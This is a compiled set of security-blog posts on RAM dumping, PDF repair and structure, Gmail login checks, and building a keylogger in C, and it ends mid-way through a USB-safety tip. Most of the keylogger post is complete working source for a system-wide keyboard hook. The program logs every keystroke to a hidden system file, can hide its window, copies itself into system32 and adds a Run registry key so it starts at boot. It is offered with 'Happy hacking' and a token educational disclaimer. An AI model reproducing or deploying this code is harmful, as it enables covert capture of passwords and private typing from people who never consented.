Lots of information like Email Conversations, Email addresses, Chat Records, Web-pages, URL, user names, searched item in search engine etc. can be found in RAM.
I have also found Email Conversations and URL  from the past.  This article discusses about basic techniques which can be used to dump and analyze the RAM.

So, lets start to get our hand dirty….

There are many different methods like using Hardware devices, crash dumps and using software for dumping the Physical Memory(RAM).
But in this post , I will discuss the software method for acquisition of physical memory using command line tool MDD(Memory DD) .
You can download MDD tool from this link. .

Open command prompt. Enter mdd_1.3.exe -h to view all the options available.

For dumping physical memory(RAM) enter mdd_1.3.exe -o D:\RamDump.img
D:\RamDump.img is the path and file name for the image.

Now, we have successfully dumped the physical memory to a file. If this file is a crash dump file then we can easily analyze this file with window debugger.
But this file is not a crash dump file format so I will show one of the basic techniques to analyze the RAM is to search for useful strings.

So, now we will extract all the strings from this image and save the strings into another file using Strings utility from Sysinternals. You can download this tool from this link.

Open command prompt and enter Strings.exe D:\RamDump.img > Output.txt

Now you can use any text-editor to view and search the contents of Output.txt , I prefer to use Notepad++.
You can search for string like “www.”, “@”, “?q=”(for search query) etc. to find some useful info about the person using that computer.
I have find lots of email-conversation, email-addresse,URL from my PC. You can also try this out and post your comments.

Today, I will show you how can you investigate a corrupted PDF. For this purpose I have created a sample PDF. Before reading this article,I will suggest you to read this another article PDF Overview for better understanding of PDF structure.

1. PDF Reader
2. Notepad++ for editing.

So , lets start to get our hand dirty..

First, download this sample PDF and try to open this PDF.
You will see this error message.

Now open this PDF in Notepad++.

Note: I have not encoded the PDF Contents with different filters for simplicity.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191

1 0 obj
<<
	/Pages 2 0 R
	/Type /Catalog
>>
endobj
2 0 obj
<<
	/Count 2
	/Kids [ 3 0 R 5 0 R 7 0 R 9 0 R 11 0 R ]
	/Type /Pages
>>
endobj
3 0 obj
<<
	/MediaBox [ 0 0 795 842 ]
	/Parent 2 0 R
	/Contents 4 0 R
	/Resources <<
		/Font <<
			/F1 <<
				/Name /F1
				/BaseFont /Helvetica
				/Subtype /Type1
				/Type /Font
			>>
		>>
	>>
	/Type /Page
>>
endobj
4 0 obj
<<
	/Length 55
>>stream
BT
/F1 18 Tf
186 690 Td
20 TL
(www.secsavvy.com) Tj
ET
 
endstream
endobj
5 0 obj
<<
	/MediaBox [ 0 0 795 842 ]
	/Parent 2 0 R
	/Contents 6 0 R
	/Resources <<
		/Font <<
			/F1 <<
				/Name /F1
				/BaseFont /Helvetica
				/Subtype /Type1
				/Type /Font
			>>
		>>
	>>
	/Type /Page
>>
endobj
6 0 obj
<<
	/Length 45
>>stream
BT
/F1 15 Tf
186 690 Td
20 TL
(Page 1) Tj
ET
 
endstream
endobj
7 0 obj
<<
	/MediaBox [ 0 0 795 842 ]
	/Parent 2 0 R
	/Contents 8 0 R
	/Resources <<
		/Font <<
			/F1 <<
				/Name /F1
				/BaseFont /Helvetica
				/Subtype /Type1
				/Type /Font
			>>
		>>
	>>
	/Type /Page
>>
endobj
8 0 obj
<<
	/Length 45
>>stream
BT
/F1 15 Tf
186 690 Td
20 TL
(Page 2) Tj
ET
 
endstream
endobj
9 0 obj
<<
	/MediaBox [ 0 0 795 842 ]
	/Parent 2 0 R
	/Contents 10 0 R
	/Resources <<
		/Font <<
			/F1 <<
				/Name /F1
				/BaseFont /Helvetica
				/Subtype /Type1
				/Type /Font
			>>
		>>
	>>
	/Type /Page
>>
endobj
10 0 obj
<<
	/Length 45
>>stream
BT
/F1 15 Tf
186 690 Td
20 TL
(Page 3) Tj
ET
 
endstream
endobj
11 0 obj
<<
	/MediaBox [ 0 0 795 842 ]
	/Parent 2 0 R
	/Content 12 0 R
	/Resources <<
		/Font <<
			/F1 <<
				/Name /F1
				/BaseFont /Helvetica
				/Subtype /Type1
				/Type /Font
			>>
		>>
	>>
	/Type /Page
>>
endobj
12 0 obj
<<
	/Length 47
>>stream
BT
/F1 15 Tf
186 690 Td
20 TL
(Password) Tj
ET
 
endstream
endobj
xref
0 13
0000000000 65535 f
0000000010 00000 n
0000000067 00000 n
0000000161 00000 n
0000000398 00000 n
0000000510 00000 n
0000000747 00000 n
0000000849 00000 n
0000001086 00000 n
0000001188 00000 n
0000001426 00000 n
0000001529 00000 n
0000001768 00000 n
trailer
<<
	/Root 1 0 R
	/Size 13
>>
startxref
1873
%%EOF

PDF file consists of 4 elements:

• PDF header identifying the PDF specification.
• A body containing the objects that make up the document contained in the file
• A cross-reference table containing information about the indirect objects in the file
• A trailer giving the location of the cross-reference table and of certain special objects within the body of the file.

But in this case there is no header so we will add a PDF header and try to open this PDF.

Now we are able to open this PDF.




We can see that this PDF consists of 2 pages as shown in image above but investigate further to verify it.

Now, we are able to find that this PDF has actually total 5 pages so edit the Count from 2 to 5 and open this PDF.

Now, we are able to see all 5 pages but last page is blank so we will investigate further.
Last page is pointed by 11 0 R indirect object reference.

Contents keyword is used for describing the contents of a file . If this entry is absent then the page is empty.
But in this object number 12 Contents is written as Content so PDF reader is unable to recognize the name Content so it ignores the Content without giving any error.
Replace Content with Contents and open the PDF. Now you are able to see all five pages.



You can download this corrected PDF from this link.

If you are more interested to read about PDF then I recommend you to visit excellent bog of Didier Stevens

Hope you enjoyed this post , feel free to comment……

1. Objects
2. File Structure
3. Document Structure
4. Content Stream

Objects

A PDF file consists primarily of objects, of which there are eight types:

1. Boolean values, representing true or false
2. Numbers include integer and real
3. Strings
4. Names
5. Arrays, ordered collections of objects
6. Dictionaries, collections of objects indexed by Names
7. Streams, usually containing large amounts of data
8. The null object denoted by keyword null

Strings Objects

String objects can be represented in two ways:

• Literal Strings
• Hexadecimal Strings

Literal Strings consists of any number of characters between opening and closing parenthesis.

Example

(This is a string objects)

If string is too long then it can be represented using backslash as shown below

(This is a very long\

String.)

Hexadecimal Strings consists of hexadecimal character enclose with angel bracket

Example:

<A0C1D2E3F1>

Each pair of hexadecimal defines one byte of string.



Names Objects

A names object is uniquely defined by sequence of characters. Slash character(/) defined a name.

Exmaple:

/secsavvy

/SecSavvy

Both are different name.

/Sec#20Savvy mean Sec Savvy 20 is hexadecimal value for white space.

Note: Pdf is case-sensitive.



Array Objects

An array object is collection of objects. PDF array object can be heterogeneous. It is defined with square brackets.

Example:

[1 (string) /Name 3.14]



Dictionary Objects

Dictionary object consists of pairs of objects. The first element is key and the second is value.

The key must be name. A dictionary is written as a sequence of key-value pairs enclosed in double angle brackets (<< … >>).

Example:

<<  /Type /Pages

/Kids [ 4 0 R ]

/Count 1

>>

Count is a key and 1 is value.



Stream Objects

A stream object, like a string object, is a sequence of bytes. Stream can be of unlimited length, whereas a string is subject to an implementation limit. For this reason, objects with potentially large amounts of data, such as images and page descriptions, are represented as streams.

A stream consists of a dictionary followed by zero or more bytes bracketed between the keywords stream and endstream:

dictionary

stream

… Zero or more bytes …

endstream



Indirect Objects

Objects may be labeled so that they can be referred to by other objects. A labeled object is called an indirect object.

Example

Consider this object

obj and endobj is a keyword.

10 0 obj

(SecSavvy String)

endobj

This object defined a string of object number 10.

This object can be referred in a file by indirect reference as

10 0 R

Filters

A filter is an optional part of the specification of a stream, indicating how the data in the stream must be decoded before it is used. For example, if a stream has an ASCIIHexDecode filter, an application reading the data in that stream will transform the ASCII hexadecimal-encoded data in the stream into binary data.

For data encoded using LZW and ASCII base-85 encoding (in that order) can be decoded using the following entry in the stream dictionary:

/Filter [ /ASCII85Decode /LZWDecode ]

Example

1 0 obj

<< /Length 534 /Filter [ /ASCII85Decode /LZWDecode ]>>

stream

J..)6T`?p&<!J9%_[umg"B7/Z7KNXbN'S+,*Q/&"OLT'FLIDK#!n`$"<Atdi`\Vn%b%)&'cA*VnK\CJY(sF>c!Jnl@RM]WM;jjH6Gnc75idkL5]+cPZKEBPWdR>FF(kj1_R%W_d&/jS!;iuad7h?[L−F$+]]0A3Ck*$I0KZ?;<)CJtqi65XbVc3\n5ua:Q/=0$W<#N3U;H,MQKqfg1?:lUpR;6oN[C2E4ZNr8Udn.'p+?#X+1>0Kuk$bCDF/(3fL5]Oq)^kJZ!C2H1′TO]Rl?Q:&’<5&iP!$Rq;BXRecDN[IJB`,)o8XJOSJ9sDS]hQ;Rj@!ND)bD_q&C\g:inYC%)&u#:u,M6Bm%IY!Kb1+”:aAa’S`ViJglLb8<W9k6Yl\\0McJQkDeLWdPN?9A’jX*al>iG1p&i;eVoK&juJHs9%;Xomop”5KatWRT”JQ#qYuL,JD?M$0QP)lKn06l1apKDC@\qJ4B!!(5m+j.7F790m(Vj88l8Q:_CZ(Gm1%X\N1&u!FKHMB~>

endstream

endobj

List of Standard Filters:

• ASCIIHexDecode
• ASCII85Decode
• LZWDecode
• FlateDecode
• RunLengthDecode
• CCITTFaxDecode
• JBIG2Decode
• DCTDecode
• JPXDecode
• Crypt

File Structure

PDF file consists of 4 elements:

• PDF header identifying the PDF specification.
• A body containing the objects that make up the document contained in the file
• A cross-reference table containing information about the indirect objects in the file
• A trailer giving the location of the cross-reference table and of certain special objects within the body of the file.

Cross Reference Table

The cross-reference table contains information that permits random access to indirect objects within the file so that the entire file need not be read to locate any particular object. The table contains a one-line entry for each indirect object, specifying the location of that object within the body of the file.

Each cross-reference section begins with a line containing the keyword xref. Following this line are one or more cross-reference subsections, which may appear in any order.

Each cross-reference subsection contains entries for a contiguous range of object numbers. The subsection begins with a line containing two numbers separated by a space: the object number of the first object in this subsection and the number of entries in the subsection. For example, the line

0 8

introduces a subsection containing five objects numbered consecutively from 0 to 8.

xref

0 8

0000000000 65535 f

0000000009 00000 n

0000000074 00000 n

0000000120 00000 n

0000000179 00000 n

0000000364 00000 n

0000000466 00000 n

0000000496 00000 n

0000000009 is 10 digit byte offset in the case of in-use entry , giving the number of bytes from the beginning of the file to the beginning of the object.

0000000000 is the 10-digit object number of the next free object int the case of free entry

Example of Simple Hello World Text PDF

For more details refer this PDF Reference

Today I will share about the technique which you can use to catch the hacker.

If you are suspicious about some one accessing your Gmail account then you can follow these steps to verify it:

1. Open up your Gmail account and navigate to the bottom of the page.





2. Click on details.




Now, you can see lists of  last 10 IP addresses from where you or hacker had logged into your Gmail account(Previously only last 5 IP addresses were shown).



IP address: An Internet Protocol address(IP address)  is a number assigned to devices(PC) in computer networks like telephone number is assigned to every telephone.



1st Column is Access type, if your are accessing your Gmail account from browser then you should see Browser in this column but if your Recent activity table is showing some POP access(Outlook, Thunderbird etc.), it may be a sign that your account has been compromised.



2nd Column is Location, this column shows your IP addresses from where you have accessed your account.  You can use this IP Locator website which will assist you in locating the geographical location of an IP Address. If one location is Pune and the other shows Chennai then someone else has accessed your account but if both shows same location then you need to know more information about this IP address.

Open this whois website and enter the IP address. You will see lots of information like ISP name, address, contact number, email address etc which will help you to decide whether your account has been compromised or not.

Concurrent Sessions
If your mail is currently being accessed from another location, you will see  list of other session(s) in the Concurrent session information table. You can sign out all sessions other than your current session by clicking Sign out all other sessions and change your password if you think your account has been compromised.

Hope you enjoyed this post , feel free to comment……

Keylogger is a program which logs everything which we type on our keyboard. So everything you type including passwords,website name etc is saved in your PC.Advanced keylogger include following features:

• Capture every keystroke.
• Captures screenshots of our PC at regular interval.
• Send screenshots and logs via mail or ftp
• Runs in stealth mode and is not visible in the task bar, system tray, Task Manager, Windows Startup list etc.
• It will record the application that was in use that received the keystroke. and many other features etc.

• Monitor the activities of employee by employer.
• Used to monitor the surfing habit of children by parents.
• and many others…

Now, I will show you one of the way to build your own keylogger in C.
Prerequisite: You should know the basics of C Programming Language and Windows API.

Windows Hooking is one of the way to build your own keylogger.

Hooking mechanism permits us to intercept and alter the flow of messages in the OS before they reach the application.For different messages there are different types of hooks. For example, for keyboards message there is keyboard hook, for mouse message there is mouse hook etc. For complete list of different type of hook refer this link. A function that intercepts a particular type of event is known as a hook procedure. A hook procedure can act on each event it receives, and then modify or discard the event.

We will use hooking on Keyboard to monitor keyboard activity so every time user press any key our function is notified about it.

First of all, we will understand this two different type of code used in keyboard hooking:

• Virtual Key Code

Virtual key code is the device independent code used by the operating system itself. For every key there is code associated with it e.g. VK_SHIFT(0×10) is the virtual key code for Shift key. Visit this link which shows the symbolic constant names, hexadecimal values, and mouse or keyboard equivalents for the virtual-key codes used by the system.

• Scan Code

Scan Code is hardware dependent code that identifies which key is pressed or released. This code differs from keyboard to keyboard.

When we press any key then it generate a scan code usually by keyboard device driver. OS translates this code to virtual key code which is normally used by programmer.

These are the Windows API used to build up a keylogger:

• Install a hook with the Windows API SetWindowsHookEx on keyboard.

SetWindowsHookEx(WH_KEYBOARD_LL,(HOOKPROC)LowLevelKeyboardProc, hExe, 0);

1st Parameter idHook: WH_KEYBOARD_LL – Installs a hook procedure that monitors low-level keyboard input events.
2nd Parameter lpfn: LowLevelKeyboardProc – A pointer to the hook procedure which is called when any keyboar event occurs
3rd Parameter hMod: hExe – A handle to the DLL containing the hook procedure
4th Parameter dwThreadId: 0 – The hook procedure is associated with all existing threads running(System-wide)

• UnhookWindowsHookEx :Free system resources associated with the hook and removes a hook procedure

UnhookWindowsHookEx(hKeyHook);

Parameter hhk: hKeyHook – A handle to the hook to be removed.

• GetAsyncKeyState : Determines whether a key is up or down at the time the function is called

GetAsyncKeyState(VK_SHIFT);

Parameter:VK_SHIFT is virtual key code for shift key
For more details visit this link

• GetKeyNameText: Retrieves a string that represents the name of a key.

GetKeyNameText(dwMsg,key,15);

1st Parameter dwMsg contains the scan code and Extended flag
2nd Parameter lpString: lpszName – The buffer that will receive the key name.
3rd Parameter cchSize: The maximum length, in characters, of the key name, including the terminating null character
If the function succeeds, a null-terminated string is copied into the specified buffer,

• CallNextHookEx: Passes the hook information to the next hook procedure

CallNextHookEx( NULL, nCode, wParam, lParam );

1st Parameter hhk – Optional
2nd Parameter nCode – The next hook procedure uses this code to determine how to process the hook information.
3rd Parameter wParam – The wParam value passed to the current hook procedure.
4th Parameter lParam – The lParam value passed to the current hook procedure

• RegisterHotKey: Defines a system-wide hot key of Alt+Ctrl+9

RegisterHotKey(NULL, 1, MOD_ALT | MOD_CONTROL, 0×39);

1st Parameter hWnd(optional) :NULL – A handle to the window that will receive hot key message generated by hot key.
2nd Parameter id:1 – The identifier of the hot key
3rd Parameter fsModifiers: MOD_ALT | MOD_CONTROL – The keys that must be pressed in combination with the key specified by the 4th parameter in order to generate the WM_HOTKEY message.
4th Parameter vk: 0×39(9) – The virtual-key code of 9

1. Create a thread that starts keylogger function.
2. Install system wide keyboard hook using SetWindowsHookEx.
3. Check the virtual key code from Keyboard structure and write the actual key in the file.
4. CallNextHookEx is called to pass the hook to another application.
5. Also register a hot key (Atl+Ctrl+9) to exit the keylooger.
6. Unhook the hook procedure to free the resources.

Please read the comments in the Code for better understanding.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363

#include <windows.h>
#include <winuser.h>
#include <stdio.h>
 
// function to check caps lock
int isCapsLock()
{
     if ((GetKeyState(VK_CAPITAL) & 0x0001)!=0)
        return 1;
     else
        return 0;    
}
 
/* An application-defined callback function used with the SetWindowsHookEx function.
   The system calls this function every time a new keyboard input event is about to be posted into a thread input queue.
   1st Parameter  nCode - A code the hook procedure uses to determine how to process the message.
   2nd Parameter wParam - The identifier of the keyboard message. This parameter can be one of the
   following messages: WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, or WM_SYSKEYUP. 
   3rd Parameter lParam: A pointer to a KBDLLHOOKSTRUCT structure. 
*/
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    /* This structure contains information about a low-level keyboard input like virtual code, scan code, flags,
       time stamp and additional information associated with the message.
    */
    KBDLLHOOKSTRUCT *pKeyBoard = (KBDLLHOOKSTRUCT *)lParam;
    FILE *file;
    char val[5];
    DWORD dwMsg = 1;
    file=fopen("C:\\EventLog.log","a+");
    switch (wParam)
    {
 
        case WM_KEYDOWN: // When the key has been pressed. Changed from WM_KEYUP to catch multiple strokes.
        {
            // Assign virtual key code to local variable
            DWORD vkCode = pKeyBoard->vkCode;
 
            if ((vkCode>=39)&&(vkCode<=64)) // Keys 0-9
            {
 
                if (GetAsyncKeyState(VK_SHIFT)) // Check if shift key is down (fairly accurate)
                {
                    switch (vkCode) // 0x30-0x39 is 0-9 respectively
                    {
                    case 0x30:
                        fputs(")",file);
                        break;
                    case 0x31:
                        fputs("!",file);
                        break;
                    case 0x32:
                        fputs("@",file); 
                        break;
                    case 0x33:
                        fputs("#",file);  
                        break;
                    case 0x34:
                        fputs("$",file);   
                        break;
                    case 0x35:
                        fputs("%",file);  
                        break;
                    case 0x36:
                        fputs("^",file);  
                        break;
                    case 0x37:
                        fputs("&",file);  
                        break;
                    case 0x38:
                        fputs("*",file);  
                        break;
                    case 0x39:
                        fputs("(",file);  
                        break;
                    }
                }
                else // If shift key is not down
                {
                   sprintf(val,"%c",vkCode);
                   fputs(val,file);  
                }
            }
            else if ((vkCode>64)&&(vkCode<91)) // Keys a-z
            {
                /*
                The following is a complicated statement to check if the letters need to be switched to lowercase.
                Here is an explanation of why the exclusive or (XOR) must be used.
 
                Shift   Caps    LowerCase    UpperCase
                T       T       T            F
                T       F       F            T
                F       T       F            T
                F       F       T            F
 
                The above truth table shows what case letters are typed in,
                based on the state of the shift and caps lock key combinations.
 
                The UpperCase column is the same result as a logical XOR.
                However, since we're checking the opposite in the following if statement, we'll also include a NOT operator (!)
                Becuase, NOT(XOR) would give us the LowerCase column results.
 
                There's your lesson in logic if you didn't understand the next statement. Hopefully that helped.
 
                --Dan
                */
                if (!(GetAsyncKeyState(VK_SHIFT)^isCapsLock())) // Check if letters should be lowercase
                {
                    vkCode+=32; // Un-capitalize letters
                }
                sprintf(val,"%c",vkCode);
                fputs(val,file);  
            }
            else
            {
                switch (vkCode) // Check for other keys
                {
                    case VK_SPACE:
                        fputs(" ",file);
                        break;
                    case VK_LCONTROL:
                    case VK_RCONTROL:
                        fputs("[Ctrl]",file);
                        break;
                    case VK_LMENU:
                    case VK_RMENU:
                        fputs("[Alt]",file);
                        break;
                    case VK_INSERT:
                        fputs("[Insert]",file);
                        break;
                    case VK_DELETE:
                        fputs("[Del]",file);
                        break;
                    case VK_NUMPAD0:
                        fputs("0",file);
                        break;
                    case VK_NUMPAD1:
                        fputs("1",file);
                        break;
                    case VK_NUMPAD2:
                        fputs("2",file);
                        break;
                    case VK_NUMPAD3:
                        fputs("3",file);
                        break;
                    case VK_NUMPAD4:
                        fputs("4",file);
                        break;
                    case VK_NUMPAD5:
                        fputs("5",file);
                        break;
                    case VK_NUMPAD6:
                        fputs("6",file);
                        break;
                    case VK_NUMPAD7:
                        fputs("7",file);
                        break;
                    case VK_NUMPAD8:
                        fputs("8",file);
                        break;
                    case VK_NUMPAD9:
                        fputs("9",file);
                        break;
                    case VK_OEM_2:
                        if (GetAsyncKeyState(VK_SHIFT))
                             fputs("?",file);
                        else
                             fputs("/",file);
                        break;
                    case VK_OEM_3:
                        if (GetAsyncKeyState(VK_SHIFT))
                             fputs("~",file);
                        else
                             fputs("`",file);
                        break;
                    case VK_OEM_4:
                         if(GetAsyncKeyState(VK_SHIFT))
                            fputs("{",file);
                         else
                            fputs("[",file);
                         break;
                    case VK_OEM_5:
                         if(GetAsyncKeyState(VK_SHIFT))
                            fputs("|",file);
                         else
                            fputs("\\",file);
                         break;
                    case VK_OEM_6:
                         if(GetAsyncKeyState(VK_SHIFT))
                            fputs("}",file);
                         else
                            fputs("]",file);
                         break;
                    case VK_OEM_7:
                         if(GetAsyncKeyState(VK_SHIFT))
                            fputs("\\",file);
                         else
                            fputs("'",file);
                         break;
                    case VK_LSHIFT:
                    case VK_RSHIFT:
                        // do nothing;
                        break;
                    case 0xBC:                //comma       
                         if(GetAsyncKeyState(VK_SHIFT))
                            fputs("<",file);
                         else
                            fputs(",",file);
                         break;
                    case 0xBE:              //Period
                         if(GetAsyncKeyState(VK_SHIFT))
                            fputs(">",file);
                         else
                            fputs(".",file);
                         break;
                    case 0xBA:              //Semi Colon same as VK_OEM_1
                         if(GetAsyncKeyState(VK_SHIFT))
                            fputs(":",file);
                         else
                            fputs(";",file);
                         break;
                    case 0xBD:              //Minus
                         if(GetAsyncKeyState(VK_SHIFT))
                            fputs("_",file);
                         else
                            fputs("-",file);
                         break;
                    case 0xBB:              //Equal
                         if(GetAsyncKeyState(VK_SHIFT))
                            fputs("+",file);
                         else
                            fputs("=",file);
                         break;
                    default: 
 
                        /* For More details refer this link http://msdn.microsoft.com/en-us/library/ms646267            
                           As mentioned in document of GetKeyNameText http://msdn.microsoft.com/en-us/library/ms646300
                		   Scon code is present in 16..23 bits therefor I shifted the code to correct position
                           Same for Extended key flag 		
                		*/
                        dwMsg += pKeyBoard->scanCode << 16;
                        dwMsg += pKeyBoard->flags << 24;
 
                        char key[16];
                        /* Retrieves a string that represents the name of a key. 
                		   1st Parameter dwMsg contains the scan code and Extended flag
                		   2nd Parameter lpString: lpszName - The buffer that will receive the key name. 
                           3rd Parameter cchSize: The maximum length, in characters, of the key name, including the terminating null character
                           If the function succeeds, a null-terminated string is copied into the specified buffer,
                           and the return value is the length of the string, in characters, not counting the terminating null character.
                           If the function fails, the return value is zero.  
                	    */
                        GetKeyNameText(dwMsg,key,15);
                        fputs(key,file);            
                }
            }
        }
        default:
 
            fclose(file);
            /* Passes the hook information to the next hook procedure in the current hook chain.
                 1st Parameter hhk - Optional
                 2nd Parameter nCode - The next hook procedure uses this code to determine how to process the hook information.
                 3rd Parameter wParam - The wParam value passed to the current hook procedure.
                 4th Parameter lParam - The lParam value passed to the current hook procedure
            */
            return CallNextHookEx( NULL, nCode, wParam, lParam );
    }
     fclose(file);
    return 0;    
}
 
// Function called by main function to install hook
DWORD WINAPI KeyLogger(LPVOID lpParameter)
{
 
    HHOOK hKeyHook;  
    /* Retrieves a module handle for the specified module. 
	   parameter is NULL, GetModuleHandle returns a handle to the file used to create the calling process (.exe file).
	   If the function succeeds, the return value is a handle to the specified module.
       If the function fails, the return value is NULL. 
    */
    HINSTANCE hExe = GetModuleHandle(NULL);
 
    if(hExe == NULL)
    {
       return 1;           
    }
    else
    {
        /*Installs an application-defined hook procedure into a hook chain
          1st Parameter idHook: WH_KEYBOARD_LL - The type of hook procedure to be installed
          Installs a hook procedure that monitors low-level keyboard input events. 
          2nd Parameter lpfn: LowLevelKeyboardProc - A pointer to the hook procedure.
          3rd Parameter hMod: hExe - A handle to the DLL containing the hook procedure pointed to by the lpfn parameter.
          4th Parameter dwThreadId: 0 - the hook procedure is associated with all existing threads running
          If the function succeeds, the return value is the handle to the hook procedure.
          If the function fails, the return value is NULL.
        */
         hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL,(HOOKPROC)LowLevelKeyboardProc, hExe, 0);
         /*Defines a system-wide hot key of alt+ctrl+9
           1st Parameter hWnd(optional) :NULL - A handle to the window that will receive hot key message generated by hot key.
           2nd Parameter id:1 - The identifier of the hot key
           3rd Parameter fsModifiers: MOD_ALT | MOD_CONTROL -  The keys that must be pressed in combination with the key
           specified by the uVirtKey parameter in order to generate the WM_HOTKEY message. 
           4th Parameter vk: 0x39(9) - The virtual-key code of the hot key
         */
         RegisterHotKey(NULL, 1, MOD_ALT | MOD_CONTROL, 0x39);
 
         MSG msg; 
         // Message loop retrieves messages from the thread's message queue and dispatches them to the appropriate window procedures. 
         // For more info http://msdn.microsoft.com/en-us/library/ms644928%28v=VS.85%29.aspx#creating_loop
         //Retrieves a message from the calling thread's message queue.
         while (GetMessage(&msg, NULL, 0, 0) != 0)
         {
               // if Hot key combination is pressed then exit
               if (msg.message == WM_HOTKEY)
               {
                  UnhookWindowsHookEx(hKeyHook);                
                  return 0;
               }
               //Translates virtual-key messages into character messages. 
               TranslateMessage(&msg);
               //Dispatches a message to a window procedure.
               DispatchMessage(&msg);       
         }
 
         /* To free system resources associated with the hook and removes a hook procedure installed in a hook chain
           Parameter hhk: hKeyHook - A handle to the hook to be removed. 
         */
	     UnhookWindowsHookEx(hKeyHook);
    }       
    return 0;
}
 
int StartKeyLogging(char* argv[])
{
    HANDLE hThread;
	DWORD dwThread;
 
    /* CreateThread function Creates a thread to execute within the virtual address space of the calling process.
       1st Parameter lpThreadAttributes:  NULL - Thread gets a default security descriptor.
       2nd Parameter dwStackSize:  0  - The new thread uses the default size for the executable.
       3rd Parameter lpStartAddress:  KeyLogger - A pointer to the application-defined function to be executed by the thread
       4th Parameter lpParameter:  argv[0] -  A pointer to a variable to be passed to the thread
       5th Parameter dwCreationFlags: 0 - The thread runs immediately after creation.
       6th Parameter pThreadId(out parameter): NULL - the thread identifier is not returned
       If the function succeeds, the return value is a handle to the new thread.
    */
    hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)KeyLogger, (LPVOID) argv[0], 0, NULL); 
 
    if (hThread)
    {
       //Waits until the specified object is in the signaled state or the time-out interval elapses.         
       return WaitForSingleObject(hThread,INFINITE);
    }
    // if it is Null then exit the main function
    else
    {
	   return 1;
     }
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64

/*
  Name: Ayush Anand
  Website: http://www.secsavvy.com
  Date: 27/08/10 22:37
  Description: Main logic of keylogger is taken from Myhook 1.2 beta Open Source Keylogger http://myhook.sourceforge.net/
   I have added following features (or changes)
  * Log file attribute is set to hidden and system
  * Changed the code from C++ to C
  * Added a HotKey Alt+Ctrl+9 to exit the KeyLogger
  * Added Registry entry to auto start the keylogger every time computer boots
  For more details and explanation of code visit http://www.secsavvy.com
  Disclaimer: This program is for Educational Purpose.
*/
 
#include <windows.h>
#include <stdio.h>
#include<string.h>
// If visble = 0 then Keylogger is hidden oe visible =1 then keylogger is visible
const int VISIBLE = 1;
 
// Function to hide the window of keylogger
void ToHide()
{
     HWND stealth;
 
     /* Retrieves a handle to the top-level window whose class name and window name match the specified strings.
        1st Parmeter lpClassName: ConsoleWindowClass - Class Name
        2nd Parameter lpWindowName: parameter is NULL, all window names match. 
        If the function succeeds, the return value is a handle to the window that has the specified class name and window name.
        If the function fails, the return value is NULL.   
     */
     stealth=FindWindow("ConsoleWindowClass",NULL);
     ShowWindow(stealth,0);
}
 
/*
Its add registry entry to start the keylogger automatic every time computer boot
*/
void AutoStart()
{
     FILE *file;
     file = fopen("C:\\EventLog.log","r");
     //If file is not present then keylogger is run first time
     if(file==NULL)
     {
         file=fopen("C:\\EventLog.log","a+");
         //Change the atribute of file to hidden and system type file
         system("attrib +h +s C:\\EventLog.log");
         fclose(file); 
         // Add the registry entry 
         system("reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v EventLog /d %windir%\\system32\\KeyLogger.exe /f");
         // Copy the exe to system32 directory
         system("copy /Y KeyLogger.exe %windir%\\system32");
     }     
}
int main(int argc, char* argv[])
{
 
    if(VISIBLE == 0)
        ToHide();         
    AutoStart();     
    StartKeyLogging(argv);
 
}

Download the Keylogger source code from this link.
Note: I have used Dev C++ Compiler.

• Monitor you every keystroke
• Log file attribute is set to hidden and system
• Added a HotKey Alt+Ctrl+9 to exit the KeyLogger
• Added Registry entry to auto start the keylogger every time computer boots
• Log is saved in C:\EventLog.log

Delete the KeyLogger.exe from C:\Windows\system32 and delete the registry entry EventLog from “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.

Hope you enjoyed this post , feel free to comment……Happy hacking!!!!!

1. Never open a removable drive by double clicking on the drive letter in windows Explorer.

Suppose you have inserted a USB drive(J:) in your PC, then follow this simple steps to open your drive safely

• Go to Start–> Run.
• Type the drive leter e.g J: and then press enter.

Reason:
